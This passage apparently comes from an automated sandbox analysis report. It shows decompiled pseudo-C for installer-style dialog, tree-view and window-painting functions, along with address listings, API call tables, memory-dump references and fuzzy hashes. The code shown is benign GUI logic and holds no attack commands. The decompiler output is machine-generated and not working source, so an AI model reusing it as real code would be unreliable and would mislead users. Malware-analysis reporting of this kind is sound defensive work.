							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x42d260 + _t300 * 4) = _t284;
									_v16 =  *( *0x42d260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x434f2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                                                                                                          0x00404f0d
                                                                                                                                                                          0x00404f26
                                                                                                                                                                          0x00404f2b
                                                                                                                                                                          0x00404f33
                                                                                                                                                                          0x00404f39
                                                                                                                                                                          0x00404f4f
                                                                                                                                                                          0x00404f52
                                                                                                                                                                          0x0040517d
                                                                                                                                                                          0x00405184
                                                                                                                                                                          0x00405198
                                                                                                                                                                          0x00405186
                                                                                                                                                                          0x00405188
                                                                                                                                                                          0x0040518b
                                                                                                                                                                          0x0040518c
                                                                                                                                                                          0x00405193
                                                                                                                                                                          0x00405193
                                                                                                                                                                          0x004051a4
                                                                                                                                                                          0x004051b2
                                                                                                                                                                          0x004051b5
                                                                                                                                                                          0x004051cb
                                                                                                                                                                          0x00405240
                                                                                                                                                                          0x00405243
                                                                                                                                                                          0x00405245
                                                                                                                                                                          0x0040524f
                                                                                                                                                                          0x0040525d
                                                                                                                                                                          0x0040525d
                                                                                                                                                                          0x0040525f
                                                                                                                                                                          0x00405269
                                                                                                                                                                          0x0040526f
                                                                                                                                                                          0x00405272
                                                                                                                                                                          0x00405275
                                                                                                                                                                          0x00405290
                                                                                                                                                                          0x00405277
                                                                                                                                                                          0x00405281
                                                                                                                                                                          0x00405281
                                                                                                                                                                          0x00405275
                                                                                                                                                                          0x00405269
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405243
                                                                                                                                                                          0x004051d0
                                                                                                                                                                          0x004051db
                                                                                                                                                                          0x004051e0
                                                                                                                                                                          0x004051e7
                                                                                                                                                                          0x004051ec
                                                                                                                                                                          0x004051f0
                                                                                                                                                                          0x004051fb
                                                                                                                                                                          0x004051fb
                                                                                                                                                                          0x004051ff
                                                                                                                                                                          0x00405203
                                                                                                                                                                          0x00405207
                                                                                                                                                                          0x0040521a
                                                                                                                                                                          0x00405209
                                                                                                                                                                          0x00405209
                                                                                                                                                                          0x00405210
                                                                                                                                                                          0x00405216
                                                                                                                                                                          0x00405212
                                                                                                                                                                          0x00405212
                                                                                                                                                                          0x00405212
                                                                                                                                                                          0x00405210
                                                                                                                                                                          0x0040521e
                                                                                                                                                                          0x00405220
                                                                                                                                                                          0x00405233
                                                                                                                                                                          0x00405236
                                                                                                                                                                          0x00405239
                                                                                                                                                                          0x00405239
                                                                                                                                                                          0x00405203
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004051f0
                                                                                                                                                                          0x004051d2
                                                                                                                                                                          0x004051d9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405293
                                                                                                                                                                          0x00405293
                                                                                                                                                                          0x0040529a
                                                                                                                                                                          0x0040530b
                                                                                                                                                                          0x00405313
                                                                                                                                                                          0x0040531b
                                                                                                                                                                          0x0040531b
                                                                                                                                                                          0x00405324
                                                                                                                                                                          0x00405326
                                                                                                                                                                          0x0040532d
                                                                                                                                                                          0x00405330
                                                                                                                                                                          0x00405330
                                                                                                                                                                          0x00405336
                                                                                                                                                                          0x0040533d
                                                                                                                                                                          0x00405340
                                                                                                                                                                          0x00405340
                                                                                                                                                                          0x00405346
                                                                                                                                                                          0x0040534c
                                                                                                                                                                          0x00405352
                                                                                                                                                                          0x00405352
                                                                                                                                                                          0x0040535f
                                                                                                                                                                          0x004054c0
                                                                                                                                                                          0x004054c7
                                                                                                                                                                          0x004054e4
                                                                                                                                                                          0x004054ea
                                                                                                                                                                          0x004054fc
                                                                                                                                                                          0x004054fc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405365
                                                                                                                                                                          0x00405367
                                                                                                                                                                          0x0040536c
                                                                                                                                                                          0x00405371
                                                                                                                                                                          0x00405376
                                                                                                                                                                          0x00405378
                                                                                                                                                                          0x00405378
                                                                                                                                                                          0x00405379
                                                                                                                                                                          0x0040537a
                                                                                                                                                                          0x0040537c
                                                                                                                                                                          0x0040537c
                                                                                                                                                                          0x00405384
                                                                                                                                                                          0x004053c5
                                                                                                                                                                          0x004053c7
                                                                                                                                                                          0x004053d7
                                                                                                                                                                          0x004053da
                                                                                                                                                                          0x004053df
                                                                                                                                                                          0x004053e6
                                                                                                                                                                          0x004053e9
                                                                                                                                                                          0x0040548b
                                                                                                                                                                          0x00405494
                                                                                                                                                                          0x0040549c
                                                                                                                                                                          0x0040549c
                                                                                                                                                                          0x004054aa
                                                                                                                                                                          0x004054bb
                                                                                                                                                                          0x004054bb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004054aa
                                                                                                                                                                          0x004053ef
                                                                                                                                                                          0x004053f2
                                                                                                                                                                          0x004053f8
                                                                                                                                                                          0x004053fd
                                                                                                                                                                          0x004053ff
                                                                                                                                                                          0x00405401
                                                                                                                                                                          0x00405407
                                                                                                                                                                          0x0040540e
                                                                                                                                                                          0x00405413
                                                                                                                                                                          0x0040541a
                                                                                                                                                                          0x0040541d
                                                                                                                                                                          0x0040541d
                                                                                                                                                                          0x00405424
                                                                                                                                                                          0x00405430
                                                                                                                                                                          0x00405434
                                                                                                                                                                          0x00405436
                                                                                                                                                                          0x00405436
                                                                                                                                                                          0x00405426
                                                                                                                                                                          0x00405428
                                                                                                                                                                          0x00405428
                                                                                                                                                                          0x00405456
                                                                                                                                                                          0x00405462
                                                                                                                                                                          0x00405471
                                                                                                                                                                          0x00405471
                                                                                                                                                                          0x00405473
                                                                                                                                                                          0x00405476
                                                                                                                                                                          0x0040547f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405386
                                                                                                                                                                          0x00405391
                                                                                                                                                                          0x00405394
                                                                                                                                                                          0x00405399
                                                                                                                                                                          0x0040539b
                                                                                                                                                                          0x0040539f
                                                                                                                                                                          0x004053af
                                                                                                                                                                          0x004053b9
                                                                                                                                                                          0x004053bb
                                                                                                                                                                          0x004053be
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004053a1
                                                                                                                                                                          0x004053a1
                                                                                                                                                                          0x004053a7
                                                                                                                                                                          0x004053a9
                                                                                                                                                                          0x004053a9
                                                                                                                                                                          0x004053aa
                                                                                                                                                                          0x004053ab
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004053a1
                                                                                                                                                                          0x00405384
                                                                                                                                                                          0x0040535f
                                                                                                                                                                          0x004052a2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004052b8
                                                                                                                                                                          0x004052c2
                                                                                                                                                                          0x004052c7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004052d9
                                                                                                                                                                          0x004052de
                                                                                                                                                                          0x004052ea
                                                                                                                                                                          0x004052ea
                                                                                                                                                                          0x004052ec
                                                                                                                                                                          0x004052fb
                                                                                                                                                                          0x004052fd
                                                                                                                                                                          0x00405301
                                                                                                                                                                          0x00405304
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405304
                                                                                                                                                                          0x004052a2
                                                                                                                                                                          0x00404f58
                                                                                                                                                                          0x00404f5d
                                                                                                                                                                          0x00404f66
                                                                                                                                                                          0x00404f6d
                                                                                                                                                                          0x00404f7f
                                                                                                                                                                          0x00404f8a
                                                                                                                                                                          0x00404f90
                                                                                                                                                                          0x00404f9e
                                                                                                                                                                          0x00404fb2
                                                                                                                                                                          0x00404fb7
                                                                                                                                                                          0x00404fc4
                                                                                                                                                                          0x00404fc9
                                                                                                                                                                          0x00404fdf
                                                                                                                                                                          0x00404ff0
                                                                                                                                                                          0x00404ffd
                                                                                                                                                                          0x00404ffd
                                                                                                                                                                          0x00405000
                                                                                                                                                                          0x00405006
                                                                                                                                                                          0x00405008
                                                                                                                                                                          0x0040500b
                                                                                                                                                                          0x00405010
                                                                                                                                                                          0x00405015
                                                                                                                                                                          0x00405017
                                                                                                                                                                          0x00405017
                                                                                                                                                                          0x00405037
                                                                                                                                                                          0x00405037
                                                                                                                                                                          0x00405039
                                                                                                                                                                          0x0040503a
                                                                                                                                                                          0x0040503f
                                                                                                                                                                          0x00405045
                                                                                                                                                                          0x00405049
                                                                                                                                                                          0x0040504e
                                                                                                                                                                          0x00405056
                                                                                                                                                                          0x0040505a
                                                                                                                                                                          0x0040505f
                                                                                                                                                                          0x00405064
                                                                                                                                                                          0x0040506c
                                                                                                                                                                          0x0040506f
                                                                                                                                                                          0x0040513f
                                                                                                                                                                          0x00405152
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405075
                                                                                                                                                                          0x00405078
                                                                                                                                                                          0x0040507b
                                                                                                                                                                          0x0040507e
                                                                                                                                                                          0x0040507e
                                                                                                                                                                          0x00405084
                                                                                                                                                                          0x0040508d
                                                                                                                                                                          0x00405090
                                                                                                                                                                          0x00405094
                                                                                                                                                                          0x00405097
                                                                                                                                                                          0x0040509a
                                                                                                                                                                          0x004050a3
                                                                                                                                                                          0x004050ac
                                                                                                                                                                          0x004050af
                                                                                                                                                                          0x004050b2
                                                                                                                                                                          0x004050b5
                                                                                                                                                                          0x004050f3
                                                                                                                                                                          0x0040511e
                                                                                                                                                                          0x004050f5
                                                                                                                                                                          0x00405104
                                                                                                                                                                          0x00405104
                                                                                                                                                                          0x004050b7
                                                                                                                                                                          0x004050ba
                                                                                                                                                                          0x004050c8
                                                                                                                                                                          0x004050d2
                                                                                                                                                                          0x004050da
                                                                                                                                                                          0x004050e1
                                                                                                                                                                          0x004050ec
                                                                                                                                                                          0x004050ec
                                                                                                                                                                          0x004050b5
                                                                                                                                                                          0x00405124
                                                                                                                                                                          0x00405125
                                                                                                                                                                          0x00405131
                                                                                                                                                                          0x00405131
                                                                                                                                                                          0x0040513d
                                                                                                                                                                          0x00405158
                                                                                                                                                                          0x0040515b
                                                                                                                                                                          0x00405178
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040515d
                                                                                                                                                                          0x00405162
                                                                                                                                                                          0x0040516b
                                                                                                                                                                          0x004054fe
                                                                                                                                                                          0x00405510
                                                                                                                                                                          0x00405510
                                                                                                                                                                          0x0040515b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040513d
                                                                                                                                                                          0x0040506f

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32 ref: 00404F1E
                                                                                                                                                                          • GetDlgItem.USER32 ref: 00404F29
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                                                                                                          • LoadImageW.USER32 ref: 00404F8A
                                                                                                                                                                          • SetWindowLongW.USER32 ref: 00404FA3
                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                                                                                                            • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                                                                                                          • SetWindowLongW.USER32 ref: 00405152
                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 00405340
                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                                                                                                          • GetDlgItem.USER32 ref: 004054F5
                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                          • API String ID: 2564846305-813528018
                                                                                                                                                                          • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                                                                                                          • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                                                                                                                          • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                                                                                                          • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00404658, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                          			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t69 =  *0x42c240; // 0x5bafc4
						_t29 = _t69 + 0x14; // 0x5bafd8
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x433edc - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}



















                                                                                                                                                                          0x0040466a
                                                                                                                                                                          0x00404797
                                                                                                                                                                          0x004047f4
                                                                                                                                                                          0x004047f8
                                                                                                                                                                          0x004048c5
                                                                                                                                                                          0x004048c7
                                                                                                                                                                          0x004048c7
                                                                                                                                                                          0x004048cd
                                                                                                                                                                          0x004048cd
                                                                                                                                                                          0x004048d0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004048d7
                                                                                                                                                                          0x00404806
                                                                                                                                                                          0x0040480c
                                                                                                                                                                          0x00404816
                                                                                                                                                                          0x00404821
                                                                                                                                                                          0x00404824
                                                                                                                                                                          0x00404827
                                                                                                                                                                          0x00404832
                                                                                                                                                                          0x00404835
                                                                                                                                                                          0x0040483c
                                                                                                                                                                          0x00404849
                                                                                                                                                                          0x0040485a
                                                                                                                                                                          0x00404860
                                                                                                                                                                          0x00404868
                                                                                                                                                                          0x00404876
                                                                                                                                                                          0x0040487c
                                                                                                                                                                          0x0040487c
                                                                                                                                                                          0x0040483c
                                                                                                                                                                          0x00404886
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404891
                                                                                                                                                                          0x00404895
                                                                                                                                                                          0x004048a5
                                                                                                                                                                          0x004048a5
                                                                                                                                                                          0x004048ab
                                                                                                                                                                          0x004048b7
                                                                                                                                                                          0x004048b7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004048bb
                                                                                                                                                                          0x00404886
                                                                                                                                                                          0x004047a2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004047b4
                                                                                                                                                                          0x004047b4
                                                                                                                                                                          0x004047b9
                                                                                                                                                                          0x004047b9
                                                                                                                                                                          0x004047bf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004047e8
                                                                                                                                                                          0x004047ea
                                                                                                                                                                          0x004047ef
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004047ef
                                                                                                                                                                          0x004047a2
                                                                                                                                                                          0x00404670
                                                                                                                                                                          0x00404673
                                                                                                                                                                          0x00404678
                                                                                                                                                                          0x00404689
                                                                                                                                                                          0x00404689
                                                                                                                                                                          0x00404691
                                                                                                                                                                          0x00404694
                                                                                                                                                                          0x00404698
                                                                                                                                                                          0x0040469b
                                                                                                                                                                          0x0040469f
                                                                                                                                                                          0x004046a2
                                                                                                                                                                          0x004046a5
                                                                                                                                                                          0x004046a8
                                                                                                                                                                          0x004046af
                                                                                                                                                                          0x004046b1
                                                                                                                                                                          0x004046b1
                                                                                                                                                                          0x004046bb
                                                                                                                                                                          0x004046c8
                                                                                                                                                                          0x004046d2
                                                                                                                                                                          0x004046d7
                                                                                                                                                                          0x004046da
                                                                                                                                                                          0x004046df
                                                                                                                                                                          0x004046f6
                                                                                                                                                                          0x004046fd
                                                                                                                                                                          0x00404710
                                                                                                                                                                          0x00404713
                                                                                                                                                                          0x00404727
                                                                                                                                                                          0x0040472e
                                                                                                                                                                          0x00404733
                                                                                                                                                                          0x00404738
                                                                                                                                                                          0x00404738
                                                                                                                                                                          0x00404746
                                                                                                                                                                          0x00404754
                                                                                                                                                                          0x00404766
                                                                                                                                                                          0x0040476b
                                                                                                                                                                          0x0040477b
                                                                                                                                                                          0x0040477d
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • CheckDlgButton.USER32 ref: 004046F6
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0040470A
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00404738
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                                                                                                          • GetDlgItem.USER32 ref: 004047D4
                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                                                                                                          • GetDlgItem.USER32 ref: 00404806
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040485A
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404876
                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                          • String ID: Call$N
                                                                                                                                                                          • API String ID: 3103080414-3438112850
                                                                                                                                                                          • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                                                                          • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                                                                                                          • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
